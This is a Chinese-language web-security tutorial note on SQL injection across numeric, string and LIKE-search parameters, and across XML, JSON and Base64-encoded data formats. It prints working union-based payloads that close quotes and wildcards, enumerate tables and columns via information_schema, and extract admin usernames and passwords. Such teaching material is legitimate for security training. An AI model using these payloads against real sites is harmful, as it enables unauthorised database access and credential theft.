Web攻防-SQL注入数据格式参数类型JSONXML编码加密符号闭合

知识点：
1、Web攻防-SQL注入-参数类型&参数格式
2、Web攻防-SQL注入-XML&JSON&BASE64等
3、Web攻防-SQL注入-数字字符搜索等符号绕过

案例说明：
在应用中，存在参数值为数字，字符时，符号的介入，另外搜索功能通配符的再次介入，另外传输数据可由最基本的对应赋值传递改为更加智能的XML或JSON格式传递，部分保证更安全的情况还会采用编码或加密形式传递数据，给于安全测试过程中更大的挑战和难度。

一、演示案例-WEB攻防-SQL注入-参数类型&符号干扰

需要考虑闭合问题

数字

select * from news where id=$id; 

字符

select * from news where name='$name'; 

搜索

select * from news where name like '%name%';
符号干扰：有无单引号或双引号及通配符等

%' order by 3#

%' union select 1,2,3#

知道数据库名：news_db

获取数据库名下的表名信息：
借助自带的information_schema.tables表（记录所有数据库名下的表名）

1%' union select 1,2,table_name from information_schema.tables where table_schema='news_db'#

admin表名下的列名
借助自带的information_schema.columns表（记录所有数据库名下的表名对应的列名信息）

1%' union select 1,2,column_name from information_schema.columns where table_schema='news_db' and table_name='admin'#

查询列名相关数据

1%' union select 1,username,password from admin#

二、演示案例-WEB攻防-SQL注入-参数格式&参数编码

1、数据传输采用XML或JSON格式传递
2、数据传输采用编码或加密形式传递
3、数据传递采用JSON又采用编码传递

XML

<?xml version="1.0" encoding="UTF-8"?>
<news><article><id>1</id><title>xiaodi</title><content>i am xiaodi</content><created_at>2025-03-07</created_at></article><article><id>2</id><title>xiaodisec</title><content>i am xiaodisec</content><created_at>2025-03-06</created_at></article>
</news>

JSON

{"news:"[
{"id": 1,"title": "xiaodi","content": "i am xiaodi","created_at": "2025-03-07"
},
{"id": 2,"title": "xiaodisec","content": "i am xiaodisec","created_at": "2025-03-06"
}]
}

Base64

{"news": [
{"id": "MQ==","title": "eGlhb2Rp","content": "aSBhbSB4aWFvZGk=","created_at": "MjAyNS0wMy0wNw=="
},
{"id": "Mg==","title": "eGlhb2Rpc2Vj","content": "aSBhbSB4aWFvZGlzZWM=","created_at": "MjAyNS0wMy0wNg=="
}]
}

实例应用-编码注入案例

https://mp.weixin.qq.com/s/Xf08xaV-YcZsQopE19pPEQ